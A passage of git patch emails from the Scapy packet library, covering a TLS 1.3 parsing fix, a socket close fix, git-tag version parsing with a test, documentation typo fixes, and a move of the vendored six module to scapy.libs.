"unknown_psk_identity"} + 114: "bad_certificate_hash_value", 115: "unknown_psk_identity", + 116: "certificate_required", 120: "no_application_protocol"} class TLSAlert(_GenericTLSSessionInheritance): From eb1e56d676c78ccbd5a3c820b931ac50f6a5a4f8 Mon Sep 17 00:00:00 2001 From: Dimitrios Slamaris Date: Tue, 8 Mar 2022 10:50:11 +0100 Subject: [PATCH 0749/1632] TLS1.3: wrong parsing size of random_bytes (#3539) Co-authored-by: dim0x69 --- scapy/layers/tls/handshake.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 32b70a33871..74e4cc442ff 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -455,7 +455,7 @@ def tls_session_update(self, msg_str): s.sid = self.sid s.middlebox_compatibility = True - self.random_bytes = msg_str[10:38] + self.random_bytes = msg_str[6:38] s.client_random = self.random_bytes if self.ext: for e in self.ext: From 92239f0664a370cc0ce9769c3367e4c254c300d9 Mon Sep 17 00:00:00 2001 From: Oleksii Kachaiev Date: Sat, 19 Mar 2022 23:40:31 +0100 Subject: [PATCH 0750/1632] linux/L2Socket close method to check if ins attr exists before using it --- scapy/arch/linux.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 11ba2bd5199..cc19b3a42b0 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -547,7 +547,7 @@ def close(self): if self.closed: return try: - if self.promisc and self.ins: + if self.promisc and getattr(self, "ins", None): set_promisc(self.ins, self.iface, 0) except (AttributeError, OSError): pass From 402677d50cc007cb5b39dc0fdb8934dae36cf6ac Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 8 Mar 2022 12:01:07 +0100 Subject: [PATCH 0751/1632] Update git format --- scapy/__init__.py | 41 +++++++++++++++++++++++++++++------------ 1 file changed, 29 insertions(+), 12 deletions(-) diff --git a/scapy/__init__.py b/scapy/__init__.py index f920151e1e4..b68c0744da7 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -17,6 +17,24 @@ _SCAPY_PKG_DIR = os.path.dirname(__file__) +def _parse_tag(tag): + # type: (str) -> str + """ + Parse a tag from ``git describe`` into a version. + + Example:: + + v2.3.2-346-g164a52c075c8 -> '2.3.2.dev346' + """ + match = re.match('^v?(.+?)-(\\d+)-g[a-f0-9]+$', tag) + if match: + # remove the 'v' prefix and add a '.devN' suffix + return '%s.dev%s' % (match.group(1), match.group(2)) + else: + # just remove the 'v' prefix + return re.sub('^v', '', tag) + + def _version_from_git_describe(): # type: () -> str """ @@ -64,13 +82,7 @@ def _git(cmd): # Upstream was not fetched commit = _git("git rev-list --tags --max-count=1") tag = _git("git describe --tags --always --long %s" % commit) - match = re.match('^v?(.+?)-(\\d+)-g[a-f0-9]+$', tag) - if match: - # remove the 'v' prefix and add a '.devN' suffix - return '%s.dev%s' % (match.group(1), match.group(2)) - else: - # just remove the 'v' prefix - return re.sub('^v', '', tag) + return _parse_tag(tag) def _version(): @@ -96,11 +108,16 @@ def _version(): except Exception: # Rely on git archive "export-subst" git attribute. # See 'man gitattributes' for more details. - git_archive_id = '$Format:%h %d$' - sha1 = git_archive_id.strip().split()[0] - match = re.search('tag:(\\S+)', git_archive_id) - if match: - return "git-archive.dev" + match.group(1) + # Note: describe is only supported with git >= 2.32.0 + # but we use it to workaround GH#3121 + git_archive_id = '$Format:%h %(describe:tags)$'.strip().split() + sha1 = git_archive_id[0] + tag = git_archive_id[1] + if "describe" in tag: + # git is too old ! + tag = None + if tag: + return _parse_tag(tag) elif sha1: return "git-archive.dev" + sha1 else: From 60b974f223337b8da20d4c9893bc0e4f075a3ffa Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 22 Mar 2022 10:15:56 +0100 Subject: [PATCH 0752/1632] Add unit tests --- test/regression.uts | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/test/regression.uts b/test/regression.uts index 885a7c0ec72..08a5b45f7ec 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -44,6 +44,17 @@ assert not _version_checker(FakeModule2, (5, 143, 4)) assert _version_checker(FakeModule3, (2, 4, 2)) += Check Scapy version + +import scapy +from scapy import _parse_tag, _version_from_git_describe + +class GitModuleScapy(object): + __version__ = _version_from_git_describe() + +assert _parse_tag("v2.3.2-346-g164a52c075c8") == '2.3.2.dev346' +assert _version_checker(GitModuleScapy, (2, 4, 5)) + = List layers ~ conf command ls() From 8e137b8520293cbd331e18d755b32eacb25be293 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 1 Mar 2022 14:30:44 +0100 Subject: [PATCH 0753/1632] Typo fixed --- scapy/packet.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/packet.py b/scapy/packet.py index 2de4467895f..1ecbe5c765a 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -654,7 +654,7 @@ def self_build(self): except Exception as ex: try: ex.args = ( - "While disescting field '%s': " % f.name + + "While dissecting field '%s': " % f.name + ex.args[0], ) + ex.args[1:] except (AttributeError, IndexError): From d949d51f5affb619786a561792c550d2e9e1cee6 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 3 Mar 2022 16:24:18 +0100 Subject: [PATCH 0754/1632] Jupyter typo fixed --- doc/scapy/layers/http.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/layers/http.rst b/doc/scapy/layers/http.rst index bdaefa473e3..ce4e6b5c7c3 100644 --- a/doc/scapy/layers/http.rst +++ b/doc/scapy/layers/http.rst @@ -149,4 +149,4 @@ Dissect a pcap which contains a JPEG image that was sent over HTTP using chunks. HTTP 2.X -------- -The HTTP 2 documentation is available as a Jupyther notebook over here: `HTTP 2 Tuto `_ \ No newline at end of file +The HTTP 2 documentation is available as a Jupyter notebook over here: `HTTP 2 Tuto `_ From d48733db4efe411999daaac01daf90cf79ea90ca Mon Sep 17 00:00:00 2001 From: Jet <84949210+Jetsie@users.noreply.github.com> Date: Sun, 21 Nov 2021 15:29:20 -1000 Subject: [PATCH 0755/1632] Fix typo in "answser". --- doc/scapy/layers/http.rst | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/scapy/layers/http.rst b/doc/scapy/layers/http.rst index ce4e6b5c7c3..9912f80aa68 100644 --- a/doc/scapy/layers/http.rst +++ b/doc/scapy/layers/http.rst @@ -112,10 +112,10 @@ Send an HTTPRequest to ``www.secdev.org`` and write the result in a file: Pragma=b'no-cache' ) a = TCP_client.tcplink(HTTP, "www.secdev.org", 80) - answser = a.sr1(req) + answer = a.sr1(req) a.close() with open("www.secdev.org.html", "wb") as file: - file.write(answser.load) + file.write(answer.load) ``TCP_client.tcplink`` makes it feel like it only received one packet, but in reality it was recombined in ``TCPSession``. If you performed a plain ``sniff()``, you would have seen those packets. From a0a19f4caa272d7d49ad0ad3a441d71b22e5e064 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 21 Jan 2022 14:50:06 +0100 Subject: [PATCH 0756/1632] Update six to support Python 3.11 --- .config/mypy/mypy.ini | 2 +- scapy/ansmachine.py | 2 +- scapy/arch/bpf/core.py | 1 - scapy/arch/linux.py | 3 +- scapy/arch/windows/__init__.py | 4 +- scapy/asn1/asn1.py | 2 +- scapy/asn1/ber.py | 2 +- scapy/asn1/mib.py | 2 +- scapy/asn1fields.py | 2 +- scapy/asn1packet.py | 2 +- scapy/automaton.py | 2 +- scapy/autorun.py | 4 +- scapy/base_classes.py | 2 +- scapy/compat.py | 2 +- scapy/config.py | 2 +- scapy/contrib/automotive/ecu.py | 2 +- scapy/contrib/automotive/gm/gmlan_scanner.py | 2 +- .../contrib/automotive/scanner/enumerator.py | 2 +- scapy/contrib/automotive/scanner/executor.py | 2 +- scapy/contrib/automotive/scanner/test_case.py | 2 +- scapy/contrib/automotive/someip.py | 1 - scapy/contrib/automotive/uds_scan.py | 2 +- scapy/contrib/bgp.py | 2 +- scapy/contrib/cansocket.py | 2 +- scapy/contrib/cansocket_python_can.py | 2 +- scapy/contrib/cdp.py | 1 - scapy/contrib/diameter.py | 3 +- scapy/contrib/eddystone.py | 2 +- scapy/contrib/ethercat.py | 2 +- scapy/contrib/gtp.py | 1 - scapy/contrib/homeplugav.py | 1 - scapy/contrib/http2.py | 2 +- scapy/contrib/icmp_extensions.py | 2 +- scapy/contrib/isis.py | 1 - scapy/contrib/isotp/__init__.py | 2 +- scapy/contrib/isotp/isotp_native_socket.py | 2 +- scapy/contrib/isotp/isotp_soft_socket.py | 2 +- scapy/contrib/isotp/isotp_utils.py | 2 +- scapy/contrib/ldp.py | 1 - scapy/contrib/lldp.py | 4 - scapy/contrib/ltp.py | 2 +- scapy/contrib/macsec.py | 2 +- scapy/contrib/nfs.py | 2 +- scapy/contrib/openflow.py | 2 +- scapy/contrib/openflow3.py | 2 +- scapy/contrib/pnio.py | 2 +- scapy/contrib/ppi_geotag.py | 3 +- scapy/contrib/skinny.py | 1 - scapy/contrib/tacacs.py | 1 - scapy/dadict.py | 2 +- scapy/data.py | 2 +- scapy/error.py | 2 +- scapy/fields.py | 5 +- scapy/interfaces.py | 4 +- scapy/layers/all.py | 2 +- scapy/layers/bluetooth.py | 2 +- scapy/layers/bluetooth4LE.py | 1 - scapy/layers/can.py | 2 +- scapy/layers/dhcp.py | 3 +- scapy/layers/dhcp6.py | 2 +- scapy/layers/dns.py | 3 +- scapy/layers/http.py | 2 +- scapy/layers/inet.py | 3 +- scapy/layers/inet6.py | 2 +- scapy/layers/ipsec.py | 3 +- scapy/layers/l2.py | 2 +- scapy/layers/lltd.py | 2 +- scapy/layers/ntp.py | 3 +- scapy/layers/ppp.py | 2 +- scapy/layers/tftp.py | 1 - scapy/layers/tls/automaton_cli.py | 2 +- scapy/layers/tls/basefields.py | 2 +- scapy/layers/tls/cert.py | 3 +- scapy/layers/tls/crypto/cipher_aead.py | 2 +- scapy/layers/tls/crypto/cipher_block.py | 2 +- scapy/layers/tls/crypto/cipher_stream.py | 2 +- scapy/layers/tls/crypto/compression.py | 2 +- scapy/layers/tls/crypto/groups.py | 2 +- scapy/layers/tls/crypto/h_mac.py | 2 +- scapy/layers/tls/crypto/hash.py | 2 +- scapy/layers/tls/crypto/kx_algs.py | 2 +- scapy/layers/tls/crypto/pkcs1.py | 2 +- scapy/layers/tls/crypto/prf.py | 1 - scapy/layers/tls/crypto/suites.py | 2 +- scapy/layers/tls/handshake.py | 2 +- scapy/layers/tls/keyexchange_tls13.py | 2 +- scapy/layers/tls/record.py | 2 +- scapy/layers/tls/session.py | 2 +- scapy/layers/tuntap.py | 2 +- scapy/{modules => libs}/six.py | 229 +++++++++++++----- scapy/main.py | 2 +- scapy/modules/krack/crypto.py | 3 +- scapy/modules/nmap.py | 2 +- scapy/modules/p0f.py | 3 +- scapy/modules/p0fv2.py | 3 +- scapy/modules/voip.py | 1 - scapy/packet.py | 2 +- scapy/pipetool.py | 2 +- scapy/plist.py | 3 +- scapy/pton_ntop.py | 1 - scapy/scapypipes.py | 2 +- scapy/sendrecv.py | 2 +- scapy/supersocket.py | 2 +- scapy/tools/UTscapy.py | 5 +- scapy/tools/automotive/isotpscanner.py | 2 +- scapy/tools/automotive/obdscanner.py | 2 +- scapy/utils.py | 4 +- scapy/volatile.py | 2 +- test/contrib/automotive/interface_mockup.py | 2 +- .../contrib/automotive/scanner/enumerator.uts | 2 +- test/contrib/isotp_soft_socket.uts | 2 +- test/contrib/pnio_rpc.uts | 2 +- test/linux.uts | 2 +- test/regression.uts | 2 +- test/tls.uts | 2 +- test/tls/tests_tls_netaccess.uts | 6 +- tox.ini | 2 +- 117 files changed, 279 insertions(+), 201 deletions(-) rename scapy/{modules => libs}/six.py (83%) diff --git a/.config/mypy/mypy.ini b/.config/mypy/mypy.ini index 72e460f0de3..6779f9071f4 100644 --- a/.config/mypy/mypy.ini +++ b/.config/mypy/mypy.ini @@ -2,7 +2,7 @@ # Internal Scapy modules that we ignore -[mypy-scapy.modules.six,scapy.modules.six.moves,scapy.libs.winpcapy] +[mypy-scapy.libs.six,scapy.libs.six.moves,scapy.libs.winpcapy] ignore_errors = True ignore_missing_imports = True diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 2c1cc0c138c..d1b64e5b864 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -21,7 +21,7 @@ from scapy.packet import Packet from scapy.plist import PacketList -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import ( Any, diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 39a4025befc..36d746518ed 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -28,7 +28,6 @@ from scapy.interfaces import InterfaceProvider, IFACES, NetworkInterface, \ network_name from scapy.pton_ntop import inet_ntop -from scapy.modules.six.moves import range if LINUX: raise OSError("BPF conflicts with Linux") diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index cc19b3a42b0..348366f3525 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -49,8 +49,7 @@ from scapy.pton_ntop import inet_ntop from scapy.supersocket import SuperSocket -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six # Typing imports from scapy.compat import ( diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 381ec8da418..fb220594cb4 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -36,8 +36,8 @@ from scapy.utils import atol, itom, mac2str, str2mac from scapy.utils6 import construct_source_candidate_set, in6_getscope from scapy.data import ARPHDR_ETHER, load_manuf -import scapy.modules.six as six -from scapy.modules.six.moves import input, winreg +import scapy.libs.six as six +from scapy.libs.six.moves import input, winreg from scapy.compat import plain_str from scapy.supersocket import SuperSocket diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index cdb5b9c8a36..c9b52e89cf0 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -18,7 +18,7 @@ from scapy.volatile import RandField, RandIP, GeneralizedTime from scapy.utils import Enum_metaclass, EnumElement, binrepr from scapy.compat import plain_str, bytes_encode, chb, orb -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import ( Any, diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index 8782a2dca18..cd20d098afb 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -28,7 +28,7 @@ ASN1_Object, _ASN1_ERROR, ) -from scapy.modules import six +from scapy.libs import six from scapy.compat import ( Any, diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index a5768a62cec..0c48142a2af 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -14,7 +14,7 @@ from scapy.dadict import DADict, fixname from scapy.config import conf from scapy.utils import do_graph -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import plain_str from scapy.compat import ( diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index 98ee7a6c408..1950a08922b 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -40,7 +40,7 @@ from scapy.base_classes import BasePacket from scapy import packet from functools import reduce -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import ( Any, diff --git a/scapy/asn1packet.py b/scapy/asn1packet.py index 8f6e4a5b55a..f968ecb20de 100644 --- a/scapy/asn1packet.py +++ b/scapy/asn1packet.py @@ -12,7 +12,7 @@ from __future__ import absolute_import from scapy.base_classes import Packet_metaclass from scapy.packet import Packet -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import ( Any, diff --git a/scapy/automaton.py b/scapy/automaton.py index a86bbdece6e..a17d73af7c5 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -33,7 +33,7 @@ from scapy.supersocket import SuperSocket from scapy.packet import Packet from scapy.consts import WINDOWS -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import ( Any, diff --git a/scapy/autorun.py b/scapy/autorun.py index e9ea71328d3..f946a56ecfd 100644 --- a/scapy/autorun.py +++ b/scapy/autorun.py @@ -27,8 +27,8 @@ Tuple, ) -from scapy.modules.six.moves import queue -import scapy.modules.six as six +from scapy.libs.six.moves import queue +import scapy.libs.six as six ######################### diff --git a/scapy/base_classes.py b/scapy/base_classes.py index 84193639bad..de557e8b088 100644 --- a/scapy/base_classes.py +++ b/scapy/base_classes.py @@ -28,7 +28,7 @@ from scapy.error import Scapy_Exception from scapy.consts import WINDOWS -from scapy.modules.six.moves import range +from scapy.libs.six.moves import range from scapy.compat import ( Any, diff --git a/scapy/compat.py b/scapy/compat.py index a1b65ddf9c2..eb55c3d6ba1 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -16,7 +16,7 @@ import struct import sys -import scapy.modules.six as six +import scapy.libs.six as six # Very important: will issue typing errors otherwise __all__ = [ diff --git a/scapy/config.py b/scapy/config.py index 22a1bec98ea..a71c025aa66 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -25,7 +25,7 @@ from scapy.base_classes import BasePacket from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS from scapy.error import log_scapy, warning, ScapyInvalidPlatformException -from scapy.modules import six +from scapy.libs import six from scapy.themes import NoTheme, apply_ipython_style from scapy.compat import ( diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 6ee49c71960..9838ff5015c 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -17,7 +17,7 @@ from types import GeneratorType from threading import Lock -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import Any, Union, Iterable, Callable, List, Optional, \ Tuple, Type, cast, Dict, orb, ValuesView from scapy.packet import Raw, Packet diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index bea3581568b..af9e6521fcf 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -16,7 +16,7 @@ from scapy.compat import Optional, List, Type, Any, Tuple, Iterable, Dict, \ cast, Callable, orb from scapy.packet import Packet -import scapy.modules.six as six +import scapy.libs.six as six from scapy.config import conf from scapy.supersocket import SuperSocket from scapy.error import Scapy_Exception, log_interactive, warning diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 1d069c04775..5e47008c9c8 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -17,7 +17,7 @@ Dict, Tuple, Set, Callable, cast, NamedTuple, orb from scapy.error import Scapy_Exception, log_interactive from scapy.utils import make_lined_table, EDecimal -import scapy.modules.six as six +import scapy.libs.six as six from scapy.packet import Packet from scapy.contrib.automotive.ecu import EcuState, EcuResponse from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase, \ diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 48762b7f619..5c84cae838a 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -17,7 +17,7 @@ from scapy.error import Scapy_Exception, log_interactive from scapy.supersocket import SuperSocket from scapy.utils import make_lined_table, SingleConversationSocket -import scapy.modules.six as six +import scapy.libs.six as six from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu from scapy.contrib.automotive.scanner.configuration import \ AutomotiveTestCaseExecutorConfiguration diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index cc3adc1e97a..757541d3e2a 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -13,7 +13,7 @@ from scapy.compat import Any, Union, List, Optional, \ Dict, Tuple, Set, Callable, TYPE_CHECKING from scapy.utils import make_lined_table, SingleConversationSocket -import scapy.modules.six as six +import scapy.libs.six as six from scapy.supersocket import SuperSocket from scapy.contrib.automotive.scanner.graph import _Edge from scapy.contrib.automotive.ecu import EcuState, EcuResponse diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index a19e008d5d9..105a188b217 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -36,7 +36,6 @@ from scapy.layers.inet6 import IP6Field from scapy.compat import raw, orb from scapy.config import conf -from scapy.modules.six.moves import range from scapy.packet import Packet, Raw, bind_top_down, bind_bottom_up from scapy.fields import XShortField, BitEnumField, ConditionalField, \ BitField, XBitField, IntField, XByteField, ByteEnumField, \ diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 87b139e6a36..eaa90477087 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -19,7 +19,7 @@ from scapy.compat import Dict, Optional, List, Type, Any, Iterable, \ cast, Union, NamedTuple, orb, Set from scapy.packet import Raw, Packet -import scapy.modules.six as six +import scapy.libs.six as six from scapy.error import Scapy_Exception, log_interactive from scapy.contrib.automotive.uds import UDS, UDS_NR, UDS_DSC, UDS_TP, \ UDS_RDBI, UDS_WDBI, UDS_SA, UDS_RC, UDS_IOCBI, UDS_RMBA, UDS_ER, \ diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index 900113d553f..f693e3852e8 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -38,7 +38,7 @@ from scapy.config import conf, ConfClass from scapy.compat import orb, chb from scapy.error import log_runtime -import scapy.modules.six as six +import scapy.libs.six as six # diff --git a/scapy/contrib/cansocket.py b/scapy/contrib/cansocket.py index 1bc38939fc1..962488ece93 100644 --- a/scapy/contrib/cansocket.py +++ b/scapy/contrib/cansocket.py @@ -13,7 +13,7 @@ from scapy.error import log_loading from scapy.consts import LINUX from scapy.config import conf -import scapy.modules.six as six +import scapy.libs.six as six PYTHON_CAN = False diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index abb38f57481..7bc56b5b2ec 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -23,7 +23,7 @@ from scapy.packet import Packet from scapy.error import warning from scapy.compat import List, Type, Tuple, Dict, Any, Optional, cast -from scapy.modules.six.moves import queue +from scapy.libs.six.moves import queue from can import Message as can_Message from can import CanError as can_CanError diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index 3caf0ff86ae..753cde3877c 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -43,7 +43,6 @@ from scapy.layers.inet import checksum from scapy.layers.l2 import SNAP from scapy.compat import orb, chb -from scapy.modules.six.moves import range from scapy.config import conf diff --git a/scapy/contrib/diameter.py b/scapy/contrib/diameter.py index e99cb4249dd..88d6fb7f61d 100644 --- a/scapy/contrib/diameter.py +++ b/scapy/contrib/diameter.py @@ -32,8 +32,7 @@ XByteField, XIntField from scapy.layers.inet import TCP from scapy.layers.sctp import SCTPChunkData -import scapy.modules.six as six -from scapy.modules.six.moves import range +import scapy.libs.six as six from scapy.compat import chb, orb, raw, bytes_hex, plain_str from scapy.error import warning from scapy.utils import inet_ntoa, inet_aton diff --git a/scapy/contrib/eddystone.py b/scapy/contrib/eddystone.py index 33e209c0b0c..ef2f80f4977 100644 --- a/scapy/contrib/eddystone.py +++ b/scapy/contrib/eddystone.py @@ -27,7 +27,7 @@ StrFixedLenField, ShortField, FixedPointField, ByteEnumField from scapy.layers.bluetooth import EIR_Hdr, EIR_ServiceData16BitUUID, \ EIR_CompleteList16BitServiceUUIDs, LowEnergyBeaconHelper -import scapy.modules.six as six +import scapy.libs.six as six from scapy.packet import bind_layers, Packet EDDYSTONE_UUID = 0xfeaa diff --git a/scapy/contrib/ethercat.py b/scapy/contrib/ethercat.py index 77196e866c8..eb2f9ec7a3c 100644 --- a/scapy/contrib/ethercat.py +++ b/scapy/contrib/ethercat.py @@ -51,7 +51,7 @@ from scapy.fields import BitField, ByteField, LEShortField, FieldListField, \ LEIntField, FieldLenField, _EnumField, EnumField from scapy.layers.l2 import Ether, Dot1Q -import scapy.modules.six as six +import scapy.libs.six as six from scapy.packet import bind_layers, Packet, Padding ''' diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 42bcb589038..1c79df56606 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -45,7 +45,6 @@ from scapy.layers.inet import IP, UDP from scapy.layers.inet6 import IPv6, IP6Field from scapy.layers.ppp import PPP -from scapy.modules.six.moves import range from scapy.packet import bind_layers, bind_bottom_up, bind_top_down, \ Packet, Raw from scapy.volatile import RandInt, RandIP, RandNum, RandString diff --git a/scapy/contrib/homeplugav.py b/scapy/contrib/homeplugav.py index dba1848ddf1..99104685328 100644 --- a/scapy/contrib/homeplugav.py +++ b/scapy/contrib/homeplugav.py @@ -53,7 +53,6 @@ XShortField, ) from scapy.layers.l2 import Ether -from scapy.modules.six.moves import range HPAVTypeList = {0xA000: "'Get Device/sw version Request'", 0xA001: "'Get Device/sw version Confirmation'", diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 1328db595a2..50dc59815f8 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -33,7 +33,7 @@ import re from io import BytesIO import struct -import scapy.modules.six as six +import scapy.libs.six as six from scapy.compat import raw, plain_str, hex_bytes, orb, chb, bytes_encode # Only required if using mypy-lang for static typing diff --git a/scapy/contrib/icmp_extensions.py b/scapy/contrib/icmp_extensions.py index c2b802e965d..bae856177ba 100644 --- a/scapy/contrib/icmp_extensions.py +++ b/scapy/contrib/icmp_extensions.py @@ -28,7 +28,7 @@ from scapy.layers.inet6 import IP6Field from scapy.error import warning from scapy.contrib.mpls import MPLS -import scapy.modules.six as six +import scapy.libs.six as six from scapy.config import conf diff --git a/scapy/contrib/isis.py b/scapy/contrib/isis.py index b7fc222e5fb..9fcd2bfd535 100644 --- a/scapy/contrib/isis.py +++ b/scapy/contrib/isis.py @@ -80,7 +80,6 @@ from scapy.layers.inet6 import IP6ListField, IP6Field from scapy.utils import fletcher16_checkbytes from scapy.volatile import RandString, RandByte -from scapy.modules.six.moves import range from scapy.compat import orb, hex_bytes EXT_VERSION = "v0.0.3" diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py index 6c38e29a890..73f23bbe7ab 100644 --- a/scapy/contrib/isotp/__init__.py +++ b/scapy/contrib/isotp/__init__.py @@ -7,7 +7,7 @@ # scapy.contrib.status = loads from scapy.consts import LINUX -import scapy.modules.six as six +import scapy.libs.six as six from scapy.config import conf from scapy.error import log_loading diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 5f80fa61847..e029560099a 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -13,7 +13,7 @@ from scapy.compat import Optional, Union, Tuple, Type, cast from scapy.packet import Packet -import scapy.modules.six as six +import scapy.libs.six as six from scapy.error import Scapy_Exception, warning from scapy.supersocket import SuperSocket from scapy.data import SO_TIMESTAMPNS diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 5eb1d97d53c..563f3640656 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -19,7 +19,7 @@ Callable, TYPE_CHECKING from scapy.packet import Packet from scapy.layers.can import CAN -import scapy.modules.six as six +import scapy.libs.six as six from scapy.error import Scapy_Exception, warning, log_runtime from scapy.supersocket import SuperSocket from scapy.config import conf diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index 67077a1a3cf..f081bd33823 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -17,7 +17,7 @@ from scapy.sessions import DefaultSession from scapy.contrib.isotp.isotp_packet import ISOTP, N_PCI_CF, N_PCI_SF, \ N_PCI_FF, N_PCI_FC -import scapy.modules.six as six +import scapy.libs.six as six class ISOTPMessageBuilderIter(object): diff --git a/scapy/contrib/ldp.py b/scapy/contrib/ldp.py index 25152ab769b..dcd5e41b50f 100644 --- a/scapy/contrib/ldp.py +++ b/scapy/contrib/ldp.py @@ -27,7 +27,6 @@ XBitField from scapy.layers.inet import UDP from scapy.layers.inet import TCP -from scapy.modules.six.moves import range from scapy.config import conf from scapy.utils import inet_aton, inet_ntoa diff --git a/scapy/contrib/lldp.py b/scapy/contrib/lldp.py index 04d37192aa6..38d5442f38d 100644 --- a/scapy/contrib/lldp.py +++ b/scapy/contrib/lldp.py @@ -51,7 +51,6 @@ ShortField, XStrLenField, ByteField, ConditionalField, \ MultipleTypeField from scapy.packet import Packet, bind_layers -from scapy.modules.six.moves import range from scapy.data import ETHER_TYPES from scapy.compat import orb @@ -106,7 +105,6 @@ class LLDPDU(Packet): 0x06: 'system description', 0x07: 'system capabilities', 0x08: 'management address', - range(0x09, 0x7e): 'reserved - future standardization', 127: 'organisation specific TLV' } @@ -302,7 +300,6 @@ class LLDPDUChassisID(LLDPDU): 0x05: 'network address', 0x06: 'interface name', 0x07: 'locally assigned', - range(0x08, 0xff): 'reserved' } SUBTYPE_RESERVED = 0x00 @@ -358,7 +355,6 @@ class LLDPDUPortID(LLDPDU): 0x05: 'interface name', 0x06: 'agent circuit ID', 0x07: 'locally assigned', - range(0x08, 